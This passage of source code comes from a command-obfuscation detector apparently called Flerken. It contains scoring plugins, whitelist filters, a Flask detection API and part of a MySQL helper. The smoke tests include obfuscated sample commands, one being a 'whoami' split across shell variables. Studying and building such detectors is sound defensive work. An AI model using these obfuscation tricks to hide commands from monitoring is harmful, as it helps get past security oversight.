        total_cnt = len(self.cmd)
        if total_cnt == 0:
            total_cnt = 1  # avoid dividing by zero on an empty command
        return underline_cnt / total_cnt > 0.6
    def _detect_obfuscation(self):
        """Flag as obfuscated only when both the regex and underscore-ratio checks pass."""
        if self._check() and self._underline_rate():
            return {"obfuscated": True, "reason": "linux.obfus.graphic"}
        else:
            return {"obfuscated": False, "reason": ""}
--- FILE SEPARATOR ---
#!/usr/bin/python
# -*-coding:utf-8-*-
# Path:plugins/linux_special_detect_plugin.py
__author__ = 'Yao Zhang & Zhiyang Zeng'
__copyright__ = "Copyright 2019, Apache License 2.0"
import re
import json
import os
import warnings
class linux_special_detect_plugin(object):
    """Detect 'special' Linux obfuscation: symbol-only variable names,
    string manipulation, and file-I/O based command construction.

    ``self.result`` is computed at construction time.
    """
    def __init__(self, cmd):
        self.cmd = cmd
        self.result = self._detect_obfuscation()
    def _load_special_rules(self, type):
        """Load the 'special' rule group *type*; fall back to the parent-relative path."""
        try:
            with open(os.path.join(os.getcwd(),'flerken/config/rules/linux_rule.json')) as f:
                return json.load(f)['special'][type]
        except Exception:
            # Running from a subdirectory (e.g. tests/): retry one level up.
            with open(os.path.join(os.getcwd(),'../flerken/config/rules/linux_rule.json')) as f:
                return json.load(f)['special'][type]
    def _prepare_pattern(self, regex):
        """Compile *regex*; on error warn and return a never-matching pattern."""
        try:
            return re.compile(regex)
        except re.error as e:
            warnings.warn(
                "Caught '{error}' compiling regex: {regex}"
                .format(error=e, regex=regex)
            )
            return re.compile(r'(?!x)x')
    def _check_symbol_varible_name(self):
        """True when at least two symbol-style variable names occur in the command."""
        svn_rule = self._load_special_rules('symbol_varible_name')
        svn_rule_compiled = self._prepare_pattern(svn_rule['regex'])
        matches = svn_rule_compiled.findall(self.cmd)  # renamed: 'list' shadowed the builtin
        return len(matches) >= 2
    def _check_string_manipulation(self):
        """True when the string-manipulation rule matches the command."""
        sm_rule = self._load_special_rules('string_manipulation')
        sm_rule_compiled = self._prepare_pattern(sm_rule['regex'])
        return sm_rule_compiled.search(self.cmd) is not None
    def _check_file_io(self):
        """True when the command builds itself through file I/O (rules 0-3)."""
        fi_rules = self._load_special_rules('file_io')
        fi_rules_compiled = dict()
        for rule in fi_rules:
            fi_rules_compiled[int(rule)] = self._prepare_pattern(fi_rules[rule]['regex'])
        if fi_rules_compiled[0].search(self.cmd) == None:
            return False
        # NOTE(review): the original extracted group(5) of rule 0 into an
        # unused local; the dead assignment is dropped here.
        if fi_rules_compiled[1].search(self.cmd) != None and fi_rules_compiled[2].search(self.cmd) != None:
            return True
        elif fi_rules_compiled[3].search(self.cmd) != None:
            return True
        else:
            return False
    def _detect_obfuscation(self):
        """Combine the three special checks into the final verdict."""
        symbol_varible_name_check = self._check_symbol_varible_name()
        string_manipulation_check = self._check_string_manipulation()
        file_io_check = self._check_file_io()
        if symbol_varible_name_check or string_manipulation_check or file_io_check:
            return {"obfuscated": True, "reason": "linux.obfus.special"}
        else:
            return {"obfuscated": False, "reason": ""}
--- FILE SEPARATOR ---
#!/usr/bin/python
# -*-coding:utf-8-*-
# Path:plugins/win_generic_detect_plugin.py
"""
This module detects obfuscation commands with the following four features:
- Readability
- Ratio of special chars
- Long strings with numbers
- Ratio of Spaces
"""
__author__ = 'Yao Zhang & Zhiyang Zeng'
__copyright__ = "Copyright 2019, Apache License 2.0"
import os
import re
import json
import warnings
from .win_generic_filter_plugin import win_generic_filter_plugin
class win_generic_detect_plugin(object):
    """Detect generic Windows command obfuscation from four lexical features:
    readability, ratio of special chars, long strings with numbers, and
    ratio of spaces.  The verdict is computed at construction time and
    exposed as ``self.result``.
    """
    def __init__(self, cmd):
        # cmd: the (possibly obfuscated) command line under inspection.
        self.cmd = cmd
        self.result = self._detect_obfuscation()
    def _load_generic_rules(self, type):
        """Load the 'generic' rule group *type* from win_rule.json.

        Falls back to the parent-relative path when the process is started
        from a subdirectory (e.g. the tests directory).
        """
        try:
            with open(os.path.join(os.getcwd(),'flerken/config/rules/win_rule.json')) as f:
                rules = json.loads(f.read())['generic'][type]
                return rules
        except Exception:
            with open(os.path.join(os.getcwd(),'../flerken/config/rules/win_rule.json')) as f:
                rules = json.loads(f.read())['generic'][type]
                return rules
    def _check(self):
        """Score the command and return True when it looks obfuscated.

        Computes ratio_space, ratio_special, ratio_unchar, and ratio_unread,
        then applies thresholds from the 'long_cmd' / 'shorter_cmd' /
        'shortest_cmd' rule groups depending on command length.
        Assumes each rule group provides 'length', nested 'condition'
        entries, and 'ws'/'wc'/'wu' weights — confirm against win_rule.json.
        """
        # Calculate the ratio of special chars and spaces
        ratio_special = 0
        ratio_space = 0
        # cmd_new: only the alphanumeric chars; cmd_nospace: original minus spaces.
        cmd_list = list(filter(lambda x: x.isalnum(),str(self.cmd)))
        cmd_new = "".join(cmd_list)
        cmd_nospace = str(self.cmd).replace(" ","") # squeeze out all the spaces
        # We ignore space if there are more than 10 spaces included. Also alert when there are too many spaces.
        if len(self.cmd) - len(cmd_nospace) > 10: # Here consider a compensation of 10 spaces
            cmd_new = cmd_new + " "
            cmd_nospace = cmd_nospace + " "
            ratio_space = (len(self.cmd)-len(cmd_nospace)+10)/float(len(self.cmd)) # Calculate the ratio of spaces
            if len(self.cmd) != 0:
                ratio_special = (len(cmd_nospace) - len(cmd_new)) / float(len(cmd_nospace))
        else:
            # When there are not too many spaces. We do not ignore spaces.
            cmd_list = filter(lambda x: x.isalnum(), str(self.cmd).replace(" ","a"))
            cmd_new = "".join(cmd_list)
            if len(self.cmd) != 0:
                ratio_special = (len(self.cmd) - len(cmd_new)) / float(len(self.cmd))
        # Calculate the ratio of unreadable chars
        ratio_unchar = 0
        cmd_list = filter(lambda x: x.isalnum(),str(self.cmd))
        cmd_new = "".join(cmd_list)
        cmd_nospace = str(self.cmd).replace(" ","") # squeeze out all the spaces
        # Map each "readable" punctuation char to 'a' first, so what remains
        # non-alphanumeric after the filter is the truly unreadable residue.
        cmd_unchar_list = filter(lambda x: x.isalnum(), str(self.cmd).replace("`","a").replace("~","a").replace("!","a").replace("@","a").replace("#","a").replace("$","a").replace("%","a").replace("^","a").replace("&","a").replace("*","a").replace("+","a").replace(",","a").replace(";","a").replace("\"","a").replace("'","a").replace("{","a").replace("}","a"))
        cmd_unchar = "".join(cmd_unchar_list)
        if len(self.cmd) - len(cmd_nospace) > 10: # Here consider a compensation of 10 spaces
            cmd_nospace = cmd_nospace + " "
            if (len(cmd_nospace)-len(cmd_new)) != 0:
                ratio_unchar = (len(cmd_unchar) - len(cmd_new)) / float(len(cmd_nospace)-len(cmd_new))
        else:
            if (len(self.cmd)-len(cmd_new)) != 0:
                ratio_unchar = (len(cmd_unchar)-len(cmd_new)) / float(len(self.cmd)-len(cmd_new))
        # Calculate the number of words that are composed of alphabets
        pattern = re.compile(r'[a-zA-Z]+')
        result = pattern.findall(self.cmd)
        ctr_total = len(result)
        if ctr_total == 0:
            ctr_total = 1 # Avoid ctr divide by 0 in the following code
        ctr = 0
        # Define a limited whitelist that are considered as readable words
        whitelist = [] # add this list on demand
        for word in result:
            if len(word) > 10: # (1) Long word case
                ctr += 1
            else:
                pattern_vowels = re.compile(r'[a|A|e|E|i|I|o|O|u|U]')
                result_vowels = pattern_vowels.findall(word)
                #print result_vowels
                ratio = len(result_vowels)/float(len(word))
                #print ratio
                if ratio > 0.8 or ratio < 0.4: # (2) Define a suitable vowel letter ratio interval
                    if word.lower() not in whitelist:
                        ctr += 1
                else:
                    pattern_repeat = re.compile(r'(.)\1{4}')
                    # (3) Repetition case. Find out the repeat of an alphabet for more than n times
                    result_repeat = pattern_repeat.findall(word)
                    if len(result_repeat) >= 1:
                        ctr += 1
                    else:
                        #(4) Uncommon capital case.
                        pattern_case = re.compile(r'[A-Z]')
                        pattern_first = re.compile(r'[a-z]')
                        result_case = pattern_case.findall(word)
                        case_ratio = len(result_case)/float(len(word))
                        if case_ratio >= 0.6 and case_ratio != 1:
                            ctr += 1
                            #print word
                            #print case_ratio
                        elif case_ratio > 0 and re.match(pattern_first,word):
                            ctr += 1
        ratio_unread = ctr / float(ctr_total); #Calc the ratio of unreadable words.
        long_cmd_rules = self._load_generic_rules('long_cmd')
        shorter_cmd_rules = self._load_generic_rules('shorter_cmd')
        shortest_cmd_rules = self._load_generic_rules('shortest_cmd')
        if len(self.cmd) > long_cmd_rules['length']: # long cmd case
            if ratio_space > long_cmd_rules['condition']["0"]["ratio_space"]:
                return True
            elif ratio_special > long_cmd_rules['condition']["1"]["ratio_special"] and ratio_unread > long_cmd_rules['condition']["1"]["ratio_unread"]:
                return True
            elif ratio_unchar > long_cmd_rules['condition']["2"]["ratio_unchar"] and ratio_unread > long_cmd_rules['condition']["2"]["ratio_unread"]:
                return True
            elif ratio_unchar > long_cmd_rules['condition']["3"]["ratio_unchar"] and ratio_unread > long_cmd_rules['condition']["3"]["ratio_unread"]:
                return True
            elif ratio_special > long_cmd_rules['condition']["4"]["ratio_special"] and ratio_unread > long_cmd_rules['condition']["4"]["ratio_unread"]:
                return True
            elif len(self.cmd) > long_cmd_rules['condition']["5"]["length"]:
                return True
            else:
                # No single threshold fired: fall back to a weighted score.
                ws = long_cmd_rules['ws'] # The weight of special chars
                wc = long_cmd_rules['wc'] # The weight of unreadable chars
                wu = long_cmd_rules['wu'] # The weight of unreadable words
                score = ratio_special * ws + ratio_unchar * wc + ratio_unread * wu #+ ratio_str * wl #Calc the final score.
                if score > 0.2:
                    return True
                else:
                    return False
        elif len(self.cmd) >= shorter_cmd_rules['length']: # shorter cmd case
            if ratio_special > shorter_cmd_rules['condition']["0"]["ratio_special"] and ratio_unread > shorter_cmd_rules['condition']["0"]["ratio_unread"]:
                return True
            elif ratio_unchar > shorter_cmd_rules['condition']["1"]["ratio_unchar"] and ratio_unread > shorter_cmd_rules['condition']["1"]["ratio_unread"]:
                return True
            elif ratio_unchar > shorter_cmd_rules['condition']["2"]["ratio_unchar"] and ratio_unread > shorter_cmd_rules['condition']["2"]["ratio_unread"]:
                return True
            elif ratio_special > shorter_cmd_rules['condition']["3"]["ratio_special"] and ratio_unread > shorter_cmd_rules['condition']["3"]["ratio_unread"]:
                return True
            else:
                w_s = shorter_cmd_rules['ws'] # The weight of special chars
                w_c = shorter_cmd_rules['wc'] # The weight of unreadable chars
                w_u = shorter_cmd_rules['wu'] # The weight of unreadable words
                score = ratio_special * w_s + ratio_unchar * w_c + ratio_unread * w_u #+ ratio_str * w_l #Calc the final score.
                if score > 0.2:
                    return True
                else:
                    return False
        elif len(self.cmd) > shortest_cmd_rules['length']: # shortest cmd case
            if ratio_special > shortest_cmd_rules["condition"]["0"]["ratio_special"] and ratio_unread > shortest_cmd_rules["condition"]["0"]["ratio_unread"]:
                return True
            elif ratio_unchar > shortest_cmd_rules["condition"]["1"]["ratio_unchar"] and ratio_unread > shortest_cmd_rules["condition"]["1"]["ratio_unread"]:
                return True
            elif ratio_unchar > shortest_cmd_rules["condition"]["2"]["ratio_unchar"] and ratio_unread > shortest_cmd_rules["condition"]["2"]["ratio_unread"]:
                return True
            elif ratio_special > shortest_cmd_rules["condition"]["3"]["ratio_special"] and ratio_unread > shortest_cmd_rules["condition"]["3"]["ratio_unread"]:
                return True
            else:
                w_ss = shortest_cmd_rules["ws"] # The weight of special chars
                w_cc = shortest_cmd_rules['wc'] # The weight of unreadable chars
                w_uu = shortest_cmd_rules['wu'] # The weight of unreadable words
                score = ratio_special * w_ss + ratio_unchar * w_cc + ratio_unread * w_uu #Calc the final score.
                if score > 0.2:
                    return True
                else:
                    return False
        else:
            # Command too short to score meaningfully.
            return False
    def _detect_obfuscation(self):
        """Run the whitelist filter first; only score commands it did not clear."""
        if win_generic_filter_plugin(self.cmd).result == False:
            check = self._check()
            if check == True:
                return {"obfuscated": True, "reason": "windows.obfus.generic"}
            else:
                return {"obfuscated": False, "reason": ""}
        else:
            return {"obfuscated": False, "reason": ""}
if __name__ == '__main__':
    # Manual smoke test for the detector.
    sample = ''
    print('sample command:\n'+sample+'\n')
    # BUGFIX: the original passed the undefined name `cmd` (NameError);
    # the intended argument is the `sample` defined above.
    a = win_generic_detect_plugin(sample)
    a._detect_obfuscation()
--- FILE SEPARATOR ---
#!/usr/bin/python
# -*-coding:utf-8-*-
# Path:plugins/win_special_detect_plugin.py
"""
This module detects windows special obfuscation commands
"""
__author__ = 'Yao Zhang & Zhiyang Zeng'
__copyright__ = "Copyright 2019, Apache License 2.0"
import sys, os
import json
import socket
import traceback
from math import log
import time
import re
import string
from .win_special_filter_plugin import win_special_filter_plugin
class win_special_detect_plugin():
    """Detect Windows 'special' obfuscation: a single very long unreadable
    token (e.g. a base64 blob) embedded in the command.

    ``self.result`` is computed at construction time.
    """
    def __init__(self, cmd):
        self.cmd = cmd
        self.result = self._detect_obfuscation()
    def _load_special_rules(self):
        """Load the 'special' rule group; fall back to the parent-relative path."""
        try:
            with open(os.path.join(os.getcwd(),'flerken/config/rules/win_rule.json')) as f:
                return json.load(f)['special']
        except Exception:
            # Running from a subdirectory (e.g. tests/): retry one level up.
            with open(os.path.join(os.getcwd(),'../flerken/config/rules/win_rule.json')) as f:
                return json.load(f)['special']
    def _check(self):
        """Return True when the longest base64-looking token is long and mostly unreadable."""
        # Calculate the long strings with numbers
        pattern_str = re.compile(r'[a-zA-Z0-9]+[a-zA-Z0-9|\+|\/]*[\=]*')
        result_str = pattern_str.findall(self.cmd)
        cmd1="This is a good apple"  # 20-char readable baseline; only longer tokens replace it
        for token in result_str:  # renamed from 'string': it shadowed the imported module
            if len(token) >= len(cmd1):
                cmd1 = token
        # From here on the analysis runs on the longest token only.
        self.cmd = cmd1
        # Calculate the number of words that are composed of alphabets
        pattern = re.compile(r'[a-zA-Z]+')
        result = pattern.findall(self.cmd)
        ctr_total = len(result)
        if ctr_total == 0:
            ctr_total = 1 # Avoid ctr divide by 0 in the following code
        ctr = 0
        # Define a limited whitelist that are considered as readable words
        whitelist = []
        for word in result:
            if len(word) > 2019: # (1) Long word case
                ctr += 1
            else:
                pattern_vowels = re.compile(r'[a|A|e|E|i|I|o|O|u|U]')
                result_vowels = pattern_vowels.findall(word)
                ratio = len(result_vowels)/float(len(word))
                if ratio > 0.87 or ratio < 0.42: # (2) Vowel case
                    if word.lower() not in whitelist:
                        ctr += 1
                else:
                    pattern_repeat = re.compile(r'(.)\1{4}')
                    # (3) Repetition case. Find out the repeat of an alphabet for more than n times
                    result_repeat = pattern_repeat.findall(word)
                    if len(result_repeat) >= 1:
                        ctr += 1
                    else:
                        #(4) Uncommon capital case.
                        pattern_case = re.compile(r'[A-Z]')
                        pattern_first = re.compile(r'[a-z]')
                        result_case = pattern_case.findall(word)
                        case_ratio = len(result_case)/float(len(word))
                        if case_ratio >= 0.66 and case_ratio != 1:
                            ctr += 1
                        elif case_ratio > 0 and re.match(pattern_first,word):
                            ctr += 1
        ratio_unread = ctr / float(ctr_total) #Calc the ratio of unreadable words.
        special_rules = self._load_special_rules()
        if len(self.cmd) > special_rules['length']:
            if ratio_unread > special_rules['condition']["0"]["ratio_unread"]:
                return True
            else:
                return False
        else:
            return False
    def _detect_obfuscation(self):
        """Run the whitelist filter first; only score commands it did not clear."""
        if win_special_filter_plugin(self.cmd).result == False:
            check = self._check()
            if check == True:
                return {"obfuscated": True, "reason": "windows.obfus.special"}
            else:
                return {"obfuscated": False, "reason": ""}
        else:
            return {"obfuscated": False, "reason": ""}
if __name__ == '__main__':
    #test
    # Manual smoke test: a command carrying one long base64-looking token.
    sample = 'CMD.exe HU5IGBNJM4GUGSHLHSDDS6DESQ87WE4QKLJSQIUHKNJ98HKLHJKS=='
    print('sample command:\n'+sample+'\n')
    a = win_special_detect_plugin(sample)._detect_obfuscation()
    print(a)
--- FILE SEPARATOR ---
#!/usr/bin/python
# -*-coding:utf-8-*-
# Path:plugins/win_special_filter_plugin.py
"""
This module filters windows special obfuscation commands
"""
__author__ = 'Yao Zhang & Zhiyang Zeng'
__copyright__ = "Copyright 2019, Apache License 2.0"
import re
import json
import os
class win_special_filter_plugin(object):
    """Whitelist filter for the Windows 'special' detector.

    ``self.result`` is True when *cmd* looks benign (known process names,
    popular software, or common command shapes) and should be skipped.
    """
    # Comparison operators allowed in a whitelist entry's 'condition' field.
    _CONDITIONS = {
        '<': lambda a, b: a < b,
        '>': lambda a, b: a > b,
        '<=': lambda a, b: a <= b,
        '>=': lambda a, b: a >= b,
        '=': lambda a, b: a == b,
    }
    def __init__(self,cmd):
        self.cmd = cmd
        self.result = self._check()
    def _load_special_whitelists(self, type):
        """Load the 'special' whitelist group *type*; fall back to the parent-relative path."""
        try:
            with open(os.path.join(os.getcwd(),'flerken/config/whitelists/win_whitelist.json')) as f:
                return json.load(f)['special'][type]
        except Exception:
            # Running from a subdirectory (e.g. tests/): retry one level up.
            with open(os.path.join(os.getcwd(),'../flerken/config/whitelists/win_whitelist.json')) as f:
                return json.load(f)['special'][type]
    def _prepare_pattern(self, regex):
        """Compile *regex* case-insensitively; on error warn and return a never-matching pattern."""
        try:
            return re.compile(regex, re.I)
        except re.error as e:
            # BUGFIX: this module never imported warnings at the top level,
            # so the original raised NameError whenever a rule regex was bad.
            import warnings
            warnings.warn(
                "Caught '{error}' compiling regex: {regex}"
                .format(error=e, regex=regex)
            )
            return re.compile(r'(?!x)x')
    def _unit_check(self,type):
        """Return True iff any whitelist entry of group *type* matches self.cmd.

        An entry with a 'length' key must additionally satisfy
        ``len(cmd) <condition> length``; entries with an unrecognized
        condition operator are skipped (matching the original behavior).
        The original duplicated the regex/length test for all five operators
        and had unreachable ``break`` statements after each ``return``.
        """
        self.whitelists = self._load_special_whitelists(type)
        for wl in range(0, len(self.whitelists)):
            entry = self.whitelists[str(wl)]
            regex_compiled = self._prepare_pattern(entry['regex'])
            if regex_compiled.search(self.cmd) is None:
                continue
            if 'length' in entry:
                compare = self._CONDITIONS.get(entry['condition'])
                if compare is not None and compare(len(self.cmd), entry['length']):
                    return True
            else:
                return True
        return False
    def _comm_cmd_check(self):
        """True when the command matches a common-command regex (keys "0".."2")
        while NOT matching the exclusion regex stored under key "-1".
        """
        regex_dict = self._load_special_whitelists('comm_cmd')
        regex_compile = dict()
        for key in regex_dict:
            regex_compile[int(key)] = self._prepare_pattern(regex_dict[key]['regex'])
        # NOTE(review): assumes win_whitelist.json defines a "-1" exclusion
        # entry for comm_cmd — confirm against the config file.
        #filter logic start
        if regex_compile[0].search(self.cmd) != None and regex_compile[-1].search(self.cmd) == None:
            return True
        elif regex_compile[1].search(self.cmd) != None and regex_compile[-1].search(self.cmd) == None:
            return True
        elif regex_compile[2].search(self.cmd) != None and regex_compile[-1].search(self.cmd) == None:
            return True
        return False
    def _check(self):
        """Return True when the command is whitelisted as benign."""
        # Any process/software whitelist hit means "not whitelisted here" for
        # the detector (result False -> command proceeds to scoring).
        for type in ['normal_win_process', 'popular_software']:
            if self._unit_check(type) == True:
                return False
        # Otherwise fall back to the common-command patterns.
        return self._comm_cmd_check()
if __name__ == '__main__':
    #test
    # Manual smoke test: a benign-looking process name with a redirect.
    sample = 'winAgentSC.exe >'
    print('input cmd: '+sample)
    a = win_special_filter_plugin(sample)
    out = a._check()
    print('out: '+str(out))
--- FILE SEPARATOR ---
#!/usr/bin/python
# -*-coding:utf-8-*-
"""
Flerken smart detect logic
"""
__author__ = 'Yao Zhang & Zhiyang Zeng'
__copyright__ = "Copyright 2019, Apache License 2.0"
import sys
import os
import hashlib
import time
from datetime import datetime
import re
from flerken import app
try:
from .plugins.linux_generic_detect_plugin import linux_generic_detect_plugin
except Exception:
from plugins.linux_generic_detect_plugin import linux_generic_detect_plugin
try:
from .plugins.win_special_detect_plugin import win_special_detect_plugin
except Exception:
from plugins.win_special_detect_plugin import win_special_detect_plugin
try:
from .plugins.win_generic_detect_plugin import win_generic_detect_plugin
except Exception:
from plugins.win_generic_detect_plugin import win_generic_detect_plugin
try:
from .plugins.custom_meta_chars_plugin import custom_meta_chars_plugin
except Exception:
from plugins.custom_meta_chars_plugin import custom_meta_chars_plugin
try:
from .plugins.linux_special_detect_plugin import linux_special_detect_plugin
except Exception:
from plugins.linux_special_detect_plugin import linux_special_detect_plugin
try:
from .plugins.linux_graphic_detect_plugin import linux_graphic_detect_plugin
except Exception:
from plugins.linux_graphic_detect_plugin import linux_graphic_detect_plugin
class smart_detect(object):
    """Dispatch a command line to the platform-specific obfuscation detectors.

    The constructor normalizes the raw command through the custom meta-chars
    plugin and starts a timer; the ``*_identify`` methods run the relevant
    detector plugins and decorate the winning verdict with timing, hash and
    platform information before returning it.
    """
    def __init__(self,cmd):
        app.logger.info('='*50)
        app.logger.info('[+]time: '+datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
        self.original_cmd = cmd
        app.logger.info('[+]original cmd: '+self.original_cmd)
        # Normalize shell meta characters before any detector sees the command.
        self.cmd = custom_meta_chars_plugin(cmd).result
        app.logger.info('[+]meta cmd: '+self.cmd)
        self.start_time = time.time()
    def _prepare_pattern(self, regex):
        """Compile *regex* case-insensitively.

        On an invalid pattern a warning is emitted and a never-matching
        pattern is returned instead of raising (the previous code referenced
        ``warnings`` without importing it, raising NameError on this path).
        """
        try:
            return re.compile(regex, re.I)
        except re.error as e:
            import warnings  # local import: only needed on the error path
            warnings.warn(
                "Caught '{error}' compiling regex: {regex}"
                .format(error=e, regex=regex)
            )
            # (?!x)x can never match anything.
            return re.compile(r'(?!x)x')
    def _hash_calc(self):
        """Return the SHA-256 hex digest of the normalized command."""
        sha256 = hashlib.sha256()
        sha256.update((self.cmd).encode('UTF8'))
        return sha256.hexdigest()
    def _finalize(self, result, platform):
        """Attach timing, hash, platform and echo fields to a plugin verdict."""
        self.end_time = time.time()
        result['measure_time'] = str(round(self.end_time - self.start_time,5)) + 's'
        result['hash'] = 'sha256: ' + self._hash_calc()
        result['platform'] = platform
        result['cmd'] = self.original_cmd
        result['res'] = 0
        return result
    def linux_identify(self):
        """Run the Linux detectors; precedence is graphic > special > generic."""
        generic = linux_generic_detect_plugin(self.cmd).result
        graphic = linux_graphic_detect_plugin(self.cmd).result
        special = linux_special_detect_plugin(self.cmd).result
        app.logger.info('[+]linux_identification_generic: '+str(generic))
        app.logger.info('[+]linux_identification_graphic: '+str(graphic))
        app.logger.info('[+]linux_identification_special: '+str(special))
        if graphic['obfuscated'] == True:
            return self._finalize(graphic, 'linux')
        elif graphic['obfuscated'] == False and special['obfuscated'] == True:
            return self._finalize(special, 'linux')
        else:
            return self._finalize(generic, 'linux')
    def win_identify(self):
        """Run the Windows detectors; short commands are treated as clean,
        and a generic hit on a command shorter than 50 chars is downgraded
        to 'suspicious'."""
        if len(self.cmd) <= 20:
            app.logger.info('[+]win_identify cmd length < 20')
            return self._finalize({'obfuscated': False, 'reason': ''}, 'windows')
        special_res = win_special_detect_plugin(self.cmd).result
        generic_res = win_generic_detect_plugin(self.cmd).result
        app.logger.info('[+]win_special_res: '+str(special_res))
        app.logger.info('[+]win_generic_res: '+str(generic_res))
        verdict = dict()
        if generic_res['obfuscated'] == True:
            if len(self.cmd) >= 50:
                verdict['obfuscated'] = generic_res['obfuscated']
                verdict['reason'] = generic_res['reason']
            else:
                # Generic hit on a short command is only "suspicious".
                verdict['obfuscated'] = 'suspicious'
                verdict['reason'] = 'windows.suspicious.generic'
        elif generic_res['obfuscated'] == False and special_res['obfuscated'] == True:
            verdict['obfuscated'] = special_res['obfuscated']
            verdict['reason'] = special_res['reason']
        else:
            verdict['obfuscated'] = False
            verdict['reason'] = ''
        return self._finalize(verdict, 'windows')
    def not_sure_identify(self):
        """Try the Linux detectors first, then Windows; report a likely_platform
        instead of a platform field when something is found."""
        linux_res = self.linux_identify()
        if linux_res['obfuscated'] == True:
            linux_res['likely_platform'] = 'linux'
            linux_res.pop('platform')
            return linux_res
        win_res = self.win_identify()
        if win_res['obfuscated'] == True or win_res['obfuscated'] == 'suspicious':
            win_res['likely_platform'] = 'windows'
            win_res.pop('platform')
            return win_res
        # Nothing fired anywhere: return the clean Linux verdict with an
        # empty likely_platform (the 'platform' key is kept, as before).
        not_sure_res = linux_res
        not_sure_res['likely_platform'] = ''
        return not_sure_res
if __name__ == '__main__':
    # Quick manual smoke test for the Linux detector.
    test_cmd = 'ki=w;das=ho;qq=ami;$ki$das$qq'
    print('input cmd: '+test_cmd)
    detector = smart_detect(test_cmd)
    result = detector.linux_identify()
--- FILE SEPARATOR ---
#!/usr/bin/python
# -*-coding:utf-8-*-
"""
Flerken detection page control center
"""
__author__ = 'Yao Zhang & Zhiyang Zeng'
__copyright__ = "Copyright 2019, Apache License 2.0"
from flask import render_template, request, redirect, url_for
from flerken import app
import html
import json
from .control.smart_detect import smart_detect
from .lib.mysql_conn import *
from datetime import datetime
@app.route('/detection', methods = ['GET'])
def detection_index():
    """Render the interactive detection page."""
    page = render_template("detection.html")
    return page
@app.route('/v1/detect/result.json', methods = ['POST'])
def detect_api():
    """Detection API endpoint.

    Reads ``cmd`` and ``platform`` from the POST form, runs the matching
    detector, persists the verdict in the ``results`` table and returns the
    verdict as JSON. Returns ``{'res': -1, ...}`` on bad input.

    The three platform branches previously duplicated the persistence code
    verbatim; it now lives in ``_store_result``. The unknown-platform error
    message typos ("PLatform", "choosed", "windowd") are fixed.
    """
    cmd = request.form['cmd'] if ('cmd' in request.form.keys()) else ''
    platform = request.form['platform'] if ('platform' in request.form.keys()) else 'not_sure'
    # Delete surrounding spaces and fix non-breaking spaces from HTML input.
    cmd = html.unescape(cmd).strip()
    cmd = cmd.replace(u'\xa0', u' ')
    if len(cmd) == 0:
        result = {'res': -1, 'message': 'Length of your input command is zero, please check it and try again!'}
        return json.dumps(result)
    if platform == 'linux':
        res = smart_detect(cmd).linux_identify()
        _store_result(res, 'linux', res['platform'])
        return json.dumps(res)
    elif platform == 'windows':
        res = smart_detect(cmd).win_identify()
        _store_result(res, 'windows', res['platform'])
        return json.dumps(res)
    elif platform == 'not_sure':
        res = smart_detect(cmd).not_sure_identify()
        _store_result(res, 'not_sure', res['likely_platform'])
        return json.dumps(res)
    result = {'res': -1, 'message': 'Platform should be chosen from the following list ["linux", "windows", "not_sure"]'}
    return json.dumps(result)


def _store_result(res, selected_platform, likely_platform):
    """Persist one detection verdict into the ``results`` table.

    *res* is the detector verdict dict; *selected_platform* is what the user
    asked for; *likely_platform* is what the detector concluded.
    """
    db_info = {}
    db_info['rid'] = 0
    db_info['cmd'] = res['cmd']
    db_info['hash'] = res['hash']
    db_info['obfuscated'] = str(res['obfuscated'])
    db_info['likely_platform'] = likely_platform
    db_info['selected_platform'] = selected_platform
    db_info['reason'] = res['reason']
    db_info['measure_time'] = res['measure_time']
    try:
        # Behind a reverse proxy the real client address is in X-Real-IP.
        db_info['submit_ip'] = request.headers['X-Real-IP']
    except Exception:
        db_info['submit_ip'] = request.remote_addr
    db_info['submit_time'] = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
    Results = M('results')
    Results.add(db_info)
--- FILE SEPARATOR ---
#!/usr/bin/python
# -*-coding:utf-8-*-
"""
Flerken landing page control center
"""
__author__ = 'Yao Zhang & Zhiyang Zeng'
__copyright__ = "Copyright 2019, Apache License 2.0"
from flask import render_template, request, redirect, url_for, make_response, send_from_directory
from flerken import app
import os
@app.route('/', methods = ['GET'])
@app.route('/landing', methods = ['GET'])
def landing():
    """Render the landing page for both '/' and '/landing'."""
    page = render_template("landing.html")
    return page
@app.route('/doc/<filename>', methods = ['GET'])
def doc(filename):
    """Serve a PDF document from the ./doc directory.

    ``send_from_directory`` refuses paths escaping *file_path*, which guards
    against directory traversal in *filename*. The previous
    ``filename.encode('utf-8').decode('utf-8')`` round-trip was a no-op and
    has been removed; the path is now built with ``os.path.join``.
    """
    file_path = os.path.join(os.getcwd(), 'doc')
    response = make_response(send_from_directory(file_path, filename))
    response.headers["Content-Type"] = "application/pdf"
    return response
--- FILE SEPARATOR ---
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# https://github.com/frankie-huang/pythonMySQL
import sys,os
sys.path.append(os.getcwd()+'/flerken/config')
from global_config import DB_CONFIG
import mysql.connector
import traceback
import re
import datetime
class pythonMySQL(object):
    """PHP-style chainable MySQL query builder over mysql.connector
    (based on github.com/frankie-huang/pythonMySQL, see module header).

    NOTE(review): everything below is a *class* attribute; the mutable ones
    (dicts/lists) are shared between instances unless reassigned per
    instance (``__init__`` resets some but not all of them).
    """
    configs = {}              # ConfigID -> connection config, shared registry
    current = 0               # key of the active entry in ``configs``
    config = {}               # active connection config
    con = None                # mysql.connector connection
    cur = None                # dictionary cursor (rows as dicts)
    dbdebug = False           # True enables getLastSql()
    database = ''             # active schema name
    table_name = ''           # default table bound at construction
    columns = []              # [primary_key, field1, ...]; see set_columns()
    connected = False
    queryStr = ''             # last interpolated SQL actually sent (debug)
    SQLerror = {}
    lastInsertId = 0
    numRows = 0
    tmp_table = ''            # table chosen via table() for the next query
    aliasString = ''
    fieldString = ''
    joinString = ''
    whereString = ''
    groupString = ''
    havingString = ''
    orderString = ''
    limitString = ''
    fetchSql = False          # NOTE(review): shadowed by the fetchSql() method below
    whereStringArray = []     # queued WHERE fragments; joined by parseWhere()
    whereValueArray = []      # queued placeholder values for the driver
    SQL_logic = ['AND', 'OR', 'XOR']
    def __init__(self, dbtable, ConfigID=0, dbConfig=None):
        """Bind this instance to table *dbtable*.

        The connection config comes from (in order): the cached entry for
        *ConfigID* in ``pythonMySQL.configs``, the explicit *dbConfig* dict,
        or the module-level ``DB_CONFIG`` (entry *ConfigID* merged over entry
        0 and filled with defaults), after which it is cached for reuse.
        """
        if not isinstance(ConfigID, (int, str)):
            self.throw_exception("ConfigID need to be input as str or int", True)
        # Reset the mutable containers so they are per-instance rather than
        # the shared class-level defaults.
        self.columns = []
